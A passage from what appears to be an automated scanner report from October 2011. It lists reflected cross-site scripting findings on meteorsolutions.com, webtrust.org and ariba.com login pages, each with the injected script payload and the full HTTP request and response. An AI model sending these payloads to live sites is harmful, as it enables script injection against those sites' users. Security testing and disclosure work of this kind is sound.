meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:33 GMT
Etag: "37ffb94b59a8bc6875f2fe03bbba3a2016944b60"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Content-Length: 466
Connection: keep-alive

if (typeof(meteor) === 'undefined' || meteor === null) { if (typeof(console) !== 'undefined' && console !== null) { console.log('ERROR: metsol needs to be included to track'); }} else { meteor.tracking.cdnt_data={"parent_id": "", "id": "oeXUNV1U7uA", "source": "cookie"}; meteor.tracking.track('210b48e7-54b9-49da-8cc7-374d915b8017',{"query_string_tag_key": ["CR_CCd05c9<script>alert(1)</script>95ea4625fe1", "cr_cc", "mtag"], "url_storage_source": "hash"});}

1.8. http://cdnt.meteorsolutions.com/api/multi_track [url_storage_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/multi_track

Issue detail

The value of the url_storage_source request parameter is copied into the HTML document as plain text between tags. The payload fec30<script>alert(1)</script>f8aba0eed30 was submitted in the url_storage_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/multi_track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_storage_source=hashfec30<script>alert(1)</script>f8aba0eed30&query_string_tag_key=CR_CC&query_string_tag_key=cr_cc&query_string_tag_key=mtag HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:30 GMT
Etag: "e7ee094d45b558837c747ca5bd93c1a970744515"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Content-Length: 466
Connection: keep-alive

if (typeof(meteor) === 'undefined' || meteor === null) { if (typeof(console) !== 'undefined' && console !== null) { console.log('ERROR: metsol needs to be included to track'); }} else { meteor.t
...[SNIP]...
"parent_id": "", "id": "oeXUNV1U7uA", "source": "cookie"}; meteor.tracking.track('210b48e7-54b9-49da-8cc7-374d915b8017',{"query_string_tag_key": ["CR_CC", "cr_cc", "mtag"], "url_storage_source": "hashfec30<script>alert(1)</script>f8aba0eed30"});}

1.9. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload eea01<script>alert(1)</script>e7a5c7a871a was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=210b48e7-54b9-49da-8cc7-374d915b8017&url_fbid=oeXUNV1U7uA&parent_fbid=&referrer=http%3A%2F%2Fm.microsoft.com%2Fen-us%2Fdefault.mspx&location=http%3A%2F%2Fm.microsoft.com%2FOffice365%2Foofofficephoto%2Fen-US%2Fgallery.mspx&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3Beea01<script>alert(1)</script>e7a5c7a871a HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://m.microsoft.com/Office365/oofofficephoto/en-US/gallery.mspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; meteor_server_49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3=49ff2bfd-1827-4488-8f34-2a8b9ffd5fd3%3C%3E1gfCnkBxeSl%3C%3E4pj9azku6R1%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u%3C%3Ehttp%253A%2F%2Fwww.att.com%2Fu-verse%2Favailability%2F%2523fbid%253D4pj9azku6R1%253Fsource%253DECbc0000000WIP00O; meteor_server_5ac887ae-f2fb-46fc-b054-6fb51cc91f14=5ac887ae-f2fb-46fc-b054-6fb51cc91f14%3C%3EkAnevv2-8SJ%3C%3E%3C%3Ehttp%253A%2F%2Fnews.google.com%2Fnews%2Fsection%253Fpz%253D1%2526cf%253Dall%2526ned%253Dus%2526topic%253Dtc%2526ict%253Dln%3C%3Ehttp%253A%2F%2Fwww.pcmag.com%2Farticle2%2F0%252C2817%252C2393533%252C00.asp; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 18 Oct 2011 13:58:43 GMT
Etag: "33a5ca3755db0488bdb5d003b2d594532f8b0b0b"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_210b48e7-54b9-49da-8cc7-374d915b8017=210b48e7-54b9-49da-8cc7-374d915b8017%3C%3EoeXUNV1U7uA%3C%3E%3C%3Ehttp%253A%2F%2Fm.microsoft.com%2Fen-us%2Fdefault.mspx%3C%3Ehttp%253A%2F%2Fm.microsoft.com%2FOffice365%2Foofofficephoto%2Fen-US%2Fgallery.mspx; Domain=.meteorsolutions.com; expires=Wed, 17 Oct 2012 13:58:43 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6; Domain=.meteorsolutions.com; expires=Wed, 17 Oct 2012 13:58:43 GMT; Path=/
Content-Length: 174
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "oeXUNV1U7uA", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6"}, 0);eea01<script>alert(1)</script>e7a5c7a871a

1.10. https://cert.webtrust.org/SealFile [seal parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /SealFile

Issue detail

The value of the seal request parameter is copied into the HTML document as plain text between tags. The payload 9c065<script>alert(1)</script>396aff9ffe5 was submitted in the seal parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /SealFile?seal=7819c065<script>alert(1)</script>396aff9ffe5&file=logo1 HTTP/1.1
Host: cert.webtrust.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://cert.webtrust.org/ViewSeal?id=781
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 18 Oct 2011 16:36:05 GMT
Content-Type: text/html
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Length: 3698

<html><head><title>Apache Tomcat/4.0.6 - Error report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;} BODY{font-family : sans-serif,Arial,Tahoma;c
...[SNIP]...
<pre>java.lang.NumberFormatException: For input string: "7819c065<script>alert(1)</script>396aff9ffe5"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.11. https://cert.webtrust.org/ViewSeal [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7a702<script>alert(1)</script>32ebbf9783f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ViewSeal?id=7817a702<script>alert(1)</script>32ebbf9783f HTTP/1.1
Host: cert.webtrust.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://service.ariba.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 16:36:02 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 2976

java.lang.NumberFormatException: For input string: "7817a702<script>alert(1)</script>32ebbf9783f"
   at java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
   at java.lang.Integer.parseInt(Integer.java:435)
   at java.lang.Integer.parseInt(Integer.java:476)
   at ca.cica.servlet
...[SNIP]...

1.12. https://connect.ariba.com/AC [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 441fb--><script>alert(1)</script>b6406cede49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC?441fb--><script>alert(1)</script>b6406cede49=1 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ariba.com/services/support.cfm?x=9
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:09:12 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:09:12 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC?441fb--><script>alert(1)</script>b6406cede49=1-->
...[SNIP]...

1.13. https://connect.ariba.com/AC_Login/ [IsErr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the IsErr request parameter is copied into an HTML comment. The payload ba897--><script>alert(1)</script>bd0dd96e3d3 was submitted in the IsErr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=Trueba897--><script>alert(1)</script>bd0dd96e3d3&u=a&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:32 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:31 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=Trueba897--><script>alert(1)</script>bd0dd96e3d3&u=a&sc=AC_Home_Page/-->
...[SNIP]...

1.14. https://connect.ariba.com/AC_Login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf284--><script>alert(1)</script>69a1aebb79c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/&bf284--><script>alert(1)</script>69a1aebb79c=1 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:35 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:35 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/&bf284--><script>alert(1)</script>69a1aebb79c=1-->
...[SNIP]...

1.15. https://connect.ariba.com/AC_Login/ [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the sc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e69"><script>alert(1)</script>d233b41abc1 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/44e69"><script>alert(1)</script>d233b41abc1 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:34 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:34 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<FORM METHOD=POST NAME="frmLogIn" ACTION="/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/44e69"><script>alert(1)</script>d233b41abc1">
...[SNIP]...

1.16. https://connect.ariba.com/AC_Login/ [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the sc request parameter is copied into an HTML comment. The payload 42531--><script>alert(1)</script>9d122f18f73 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/42531--><script>alert(1)</script>9d122f18f73 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:35 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:34 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/42531--><script>alert(1)</script>9d122f18f73-->
...[SNIP]...

1.17. https://connect.ariba.com/AC_Login/ [u parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /AC_Login/

Issue detail

The value of the u request parameter is copied into an HTML comment. The payload 97e5a--><script>alert(1)</script>5ae655a4126 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /AC_Login/?IsErr=True&u=a97e5a--><script>alert(1)</script>5ae655a4126&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 18 Oct 2011 18:10:33 GMT
Content-type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<!-- Vignette V6 Tue Oct 18 11:10:32 2011 -->
<HTML>
   <HEAD>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=iso-8859-1">
   <TITLE>Ariba Connect Login</TITLE>
   <link rel="stylesheet"
...[SNIP]...
<!--connect.ariba.com|443|/AC_Login/?IsErr=True&u=a97e5a--><script>alert(1)</script>5ae655a4126&sc=AC_Home_Page/-->
...[SNIP]...

1.18. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the BaseURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fd54"%3balert(1)//dfb25cd5db685531b was submitted in the BaseURL parameter. This input was echoed as 1fd54";alert(1)//dfb25cd5db685531b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com1fd54"%3balert(1)//dfb25cd5db685531b&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
